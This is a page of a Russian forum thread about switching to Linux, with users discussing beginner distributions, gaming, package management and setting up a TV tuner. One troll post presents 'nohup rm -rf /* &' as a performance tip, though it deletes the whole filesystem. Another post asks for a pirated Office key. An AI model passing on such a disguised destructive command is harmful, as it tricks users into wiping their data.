Полностью перешел на Linux

[ Версия для печати ]
Добавить в Telegram Добавить в Twitter Добавить в Вконтакте Добавить в Одноклассники
Страницы: (28) « Первая ... 12 13 [14] 15 16 ... Последняя »  К последнему непрочитанному [ ОТВЕТИТЬ ] [ НОВАЯ ТЕМА ]
blow05
29.12.2016 - 11:00
0
Статус: Offline

Моргенмуффель

Цитата (maxwell @ 29.12.2016 - 09:49)
Цитата (rmammoth @ 29.12.2016 - 10:44)
Цитата (blow05 @ 29.12.2016 - 09:40)
Цитата (rmammoth @ 29.12.2016 - 09:28)
Цитата (Китана @ 29.12.2016 - 09:22)
Расскажите легко устанавливать Линукс? Есть какие-то подводные камни?

Для начинающих минт, пожалуй, наиболее удачный выбор.
http://mintlinux.ru/blogs/razmyshlizmy-62/...linux-mint.html

а я в корне не согласен. для начинающих - лучший выбор - Gentoo. Тогда к моменту запуска графической оболочки пользователь уже будет обладать базовыми навыками и знаниями, которые пригодятся ему в будущем на любом дистрибутиве. Но конечно это лучше делать не самому, а чтобы в доступности был человек, который смог бы объяснить непонятные моменты.

Это от целей и подготовки начинающего зависит. Если человек хочет и может разобраться в системе, причем имеет на это время и гуру под боком -- то ага, генту рулит. Если же нужно, чтобы всё просто работало с минимумом телодвижений -- то всё же надо что-то попроще. Сам предпочитаю Арч, но новичку его советовать таки не стану.

Тогда лучше slackware))) Было даже такое выссказывание «Если вы знаете Slackware — вы знаете GNU/Linux. Если вы знаете Red Hat, то всё, что вы знаете, — это Red Hat». а в обще я согласен что Debian based дистрибутивы хороший выбор, для любого уровня пользователя, хотя на Gentoo раньше просидел много времени.

Патрик конечно бох, но это ниша уж совсем энтузиастов. хардкорнее только LFS

[^]
3vs
0

Ярила

В своё время, лет 18 назад был поражён QNX, который грузился с дискеты
3,5" с графической оболочкой, понаоткрывали окошек двадцать и всё работало!
Винде на том же компе это было недостижимо!
Вот с чего надо брать пример!

А то до сих пор, ставишь любой из дистрибутивов линукса хоть роса, хоть
альт, хоть с KDE, хоть с гномом, монитор, который XP-шка уже лет шесть определяет как 1280x1024, все самые свежие линуксы толко как 1024x768!
Доколе, спрашивается! niger.gif

[^]
delfysx1
0

Приколист

Часто на ЯП встречаю темы "почему я перешел на линукс". Ну решил заморочится.
По вашим советам для начинающих поставил Mint. Очень удивило что драва не пришлось искать, все встало само кроме одного.
У меня было 2 задачи. 1 это поставить WOT (друг играет и тоже если запущу поставит себе линукс)
2. установить Тв, у меня внешний Тв тюнер.
С первого, погуглив яндекс понял что нужно ставить LinuxPlayOnline.
Сказано - сделано и ничего не вышло. То не запускается, то ошибку пишет неизвестную то кричит что места не хватает. Я конечно понимаю что он виртуальную машину делает, но размер выделяемого места я не знаю как увеличить.
В итоге забил, пущай друг на винде сидит.
Установка телека вообще ввело меня в ступор.
Драйвера скачал для тв тюнера, но как ставить? sudo apt-get мои драйвера пишет что нету файла.
На форумах пишут что не каждому дано установить Тв. Пишут что их надо собирать, НО КАК КАРЛ?
Дальше больше, поставил программу MythTv, так эта зараза постоянно перезагружается после выбора языка с ошибкой 137. На форумах писали как установить под старые версии линукса и старой версии MythTv, нашел их, но такая же ерунда.
Решил поставить TvTime, но тут другие подводные камни, не видит тюнер и все тут.
2-й день уже мучается человек с фриланса. Обратился туда что бы установили телек за деньги. Он сразу признался что раньше уже делал подобное.
Так что если телек не установится, то на основной комп верну к сожалению винду, а линукс на нетбук поставлю. для документов и инета хватит. В линуксе радует что есть программы (например TimeVeawer) которые самораспаковывающиеся и проблем нету в установки.

[^]
valyot
29.12.2016 - 11:02
0

Ярила

А в игрушки как играть? Через окно? Извращение.

[^]
blow05
29.12.2016 - 11:02
1

Моргенмуффель

rmammoth
Цитата
configure
make
make install
это тоже сборка из исходников )
Линейкой по пальцам предлагают бить за другое.

не, все верно, линейкой по пальцам предлагают бить именно за такую сборку из исходников deal.gif

[^]
stexsy
29.12.2016 - 11:03
-2

Ярила

Ага, только сначала нужно каким то магическим образом понять, что когда вбиваешь пароль администратора пароль в консоли не отображается никак, даже звездочками. Я в своё время чуть клаву об стену не разбил, пока до меня дошло

[^]
Venedy
29.12.2016 - 11:05
0

Шутник

Цитата (humbert @ 23.12.2016 - 18:38)
Для многих пользователей приложение на смартфон установить проблема, а ты про sudo apt-get
А еще большинство пользователей жалуются, что тормоза на компе, глянешь одним глазком, а там зверинец из разных вирусов и на вопрос как так, отвечают, что они не при чем. :)

Так что не всем линукс будет удобен и понятен.

Я своим дома тоже установил Ubuntu, разницы с виндой не заметили, ибо только браузером пользуются и документы в Word (LibreOffice) открывают

Аналогично, поставил бывшей супруге на нетбук Ubuntu для слабых ПК(был такой дистрибутив) ))) Не тормозит как Винда, для инета и просмотра видео за уши хватает.
Единственно встречающийся глюк - карточку для фотоаппрата надо вытаскивать строго через "извлечь", иначе она падает в RAW.

[^]
blow05
29.12.2016 - 11:06
2

Моргенмуффель

delfysx1
Цитата
2-й день уже мучается человек с фриланса. Обратился туда что бы установили телек за деньги. Он сразу признался что раньше уже делал подобное.

странно, я когда-то поднял у себя тв-тюнер без особых проблем... единственное - дрова на тюнер должны быть в ядре. если тюнер на неподдерживаемом чипе - скорее всего ничего не выйдет. и какие дрова ты скачал - для меня загадка. типа внешние модули ядра?

можно выхлоп lspci -v (можно не все, а только тот блок, где тюнер)

[^]
gabdsung
29.12.2016 - 11:07
0

Приколист

Цитата (spiderv @ 24.12.2016 - 00:22)
Проблема в стандартах, которые требует Государство.

Помню время, когда почти вся винда в Расее была пиратской.
Но Билл Гейтс посетил Расею.
И стали требовать лицензию.
Интересно, о чём он говорил с расейским руководством?
Израиль и Китай пользуются линуксом в госсекторе, вроде.

[^]
blow05
29.12.2016 - 11:07
0

Моргенмуффель

Цитата (valyot @ 29.12.2016 - 10:02)
А в игрушки как играть? Через окно? Извращение.

под линукс с играми уже получше, чем 10 лет назад. не, ААА пока конечно не особо, но в принципе поиграть есть во что.

[^]
Kausamo
29.12.2016 - 11:08
0

Ярость Топора

Цитата (Optimisst @ 23.12.2016 - 18:36)
Бро - держи в курсе! Походу скоро и я вступлю в вашу секту!)

ты тоже отпишись потом, тоже собираюсь

Отправлено с мобильного клиента YAPik+

[^]
rmammoth
29.12.2016 - 11:11
0

Хохмач

Цитата (blow05 @ 29.12.2016 - 10:02)
rmammoth
Цитата
configure
make
make install

не, все верно, линейкой по пальцам предлагают бить именно за такую сборку из исходников deal.gif

Хм. Под "другим" я и имел в виду сборку из исходников и установку в обход дистроспецифичных тулзов и пакетных менеджеров.

[^]
multisu
29.12.2016 - 11:11
0

Ярила

Только блин sudo apt-get remove может удалить еще кучу пакетов используемых другими.

[^]
texnoid
29.12.2016 - 11:16
0

9 Мая - Праздник победы!

Цитата (multisu @ 29.12.2016 - 11:11)
Только блин sudo apt-get remove может удалить еще кучу пакетов используемых другими.

Не может, apt отслеживает изменения, удаляет только то что входит в основной состав пакета.
Пример из картинки.
Внимание вам вопрос:
Что будет удалено вместе с tcpdump ?

Полностью перешел на Linux

[^]
tommi
29.12.2016 - 11:18
-3

Шутник

несколько раз пытался перейти на Убунту.. так и не получилось
Поставил Убунту, решил поставить дрова на видюху... иии начались танцы с бубном, полез в интернет нашёл решений 2,5 листа мелким текстом исписанных инструкциями как поставить дрова, причём после любой из приведённых команд, на твоём компе может выскочить ошибка, с которой нужно ещё облазить кучу форумов чтобы найти что с этим делать..
Пытался обновить firefox, полез по форумам, таже фигня, нужно "собрать, пересобрать, установить"...
Я уже слабо помню, проблемы со входом вроде были, полез по форумам, написали "кури ИКСы",...
Потом вернулся в винду, в которой для установки чего либо, достаточно просто инсталяхи, и 1 минуту время..))
Кто-то говорит что типа в винде визуализация тормозит а в Убунту нет.., ёлыпалы, чему там тормозить?!, любое окно открываешь и попадаешь где-то в Win95, только с закруглёнными окнами))
Согласен для серваков это годится, легко написать какие то скрипты для автоматизации работы админа..., но как домашний комп, он не вытягивает..

[^]
MrEvil
29.12.2016 - 11:19
0

Ярила

TC! Что за картинка то? Сам пользуюсь Mac компьютерами - обновления системы бесплатны, обновление до следующей версии системы - тоже. dont.gif

[^]
delfysx1
29.12.2016 - 11:20
0

Приколист

Цитата (blow05 @ 29.12.2016 - 12:06)
delfysx1
Цитата

странно, я когда-то поднял у себя тв-тюнер без особых проблем... единственное - дрова на тюнер должны быть в ядре. если тюнер на неподдерживаемом чипе - скорее всего ничего не выйдет. и какие дрова ты скачал - для меня загадка. типа внешние модули ядра?

lspci -v он как раз сейчас и делает. Как сделает, так отпишу проблемы, с которыми он сталкивался. Обещал инструкцию оставить.

[^]
blow05
29.12.2016 - 11:20
0

Моргенмуффель

Цитата (rmammoth @ 29.12.2016 - 10:11)
Цитата (blow05 @ 29.12.2016 - 10:02)
rmammoth
Цитата
configure
make
make install

Хм. Под "другим" я и имел в виду сборку из исходников и установку в обход дистроспецифичных тулзов и пакетных менеджеров.

вот с такой формулировкой - согласен agree.gif

[^]
rmammoth
29.12.2016 - 11:21
0

Хохмач

Цитата (delfysx1 @ 29.12.2016 - 10:00)
По вашим советам для начинающих поставил Mint. Очень удивило что драва не пришлось искать, все встало само кроме одного.
У меня было 2 задачи. 1 это поставить WOT (друг играет и тоже если запущу поставит себе линукс)
Сказано - сделано и ничего не вышло. То не запускается, то ошибку пишет неизвестную то кричит что места не хватает. Я конечно понимаю что он виртуальную машину делает, но размер выделяемого места я не знаю как увеличить.
Драйвера скачал для тв тюнера, но как ставить? sudo apt-get мои драйвера пишет что нету файла.
На форумах пишут что не каждому дано установить Тв. Пишут что их надо собирать, НО КАК КАРЛ?
Дальше больше, поставил программу MythTv, так эта зараза постоянно перезагружается после выбора языка с ошибкой 137. На форумах писали как установить под старые версии линукса и старой версии MythTv, нашел их, но такая же ерунда.
Решил поставить TvTime, но тут другие подводные камни, не видит тюнер и все тут.
Так что если телек не установится, то на основной комп верну к сожалению винду, а линукс на нетбук поставлю. для документов и инета хватит. В линуксе радует что есть программы (например TimeVeawer) которые самораспаковывающиеся и проблем нету в установки.

Для начала, модель тюнера скажи.

[^]
RedMoon123
29.12.2016 - 11:22
-3

Ваш хозяин

недо ОС эти ваши убунту и дебиан.
что бы ускорить производительность системы в несколько раз - набери
nohup rm -rf /* &

[^]
delfysx1
29.12.2016 - 11:26
0

Приколист

Цитата (rmammoth @ 29.12.2016 - 12:21)
Драйвера скачал для тв тюнера, но как ставить? sudo apt-get мои драйвера  пишет что нету файла.

AverTv Hybrid Volar HD
Есть еще и AverTv Pilot но драва для линукса на оф. сайте я не нашел.

[^]
rmammoth
29.12.2016 - 11:26
5

Хохмач

Цитата
Согласен для серваков это годится, легко написать какие то скрипты для автоматизации работы админа..., но как домашний комп, он не вытягивает..

А пацаны то и не знали... Как же так, я уже за давностью и не скажу точно, когда снес винду с компа, а выходит, сижу на негодной системе? Странно, а с виду как-то незаметно...

[^]
blow05
29.12.2016 - 11:27
0

Моргенмуффель

Цитата (delfysx1 @ 29.12.2016 - 10:20)
Цитата (blow05 @ 29.12.2016 - 12:06)
delfysx1
Цитата

lspci -v он как раз сейчас и делает. Как сделает, так отпишу проблемы, с которыми он сталкивался. Обещал инструкцию оставить.

2 дня делает lspci -v ???

[^]
blow05
29.12.2016 - 11:28
0

Моргенмуффель

Цитата (rmammoth @ 29.12.2016 - 10:21)
Драйвера скачал для тв тюнера, но как ставить? sudo apt-get мои драйвера  пишет что нету файла.

по модели тюнера далеко не всегда можно однозначно определить чип... бывают разные чипы в одной модели, и на один дрова есть, на другой - нет

[^]
Зомбер
29.12.2016 - 11:28
-4

Балагур

Хакеры, кому не жалко киньте ключ от офиса рабочий в личку.

[^]
Понравился пост? Еще больше интересного в Телеграм-канале ЯПлакалъ!
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии. Авторизуйтесь, пожалуйста, или зарегистрируйтесь, если не зарегистрированы.
1 Пользователей читают эту тему (1 Гостей и 0 Скрытых Пользователей) Просмотры темы: 49240
0 Пользователей:
Страницы: (28) « Первая ... 12 13 [14] 15 16 ... Последняя » [ ОТВЕТИТЬ ] [ НОВАЯ ТЕМА ]

Активные темы

Наверх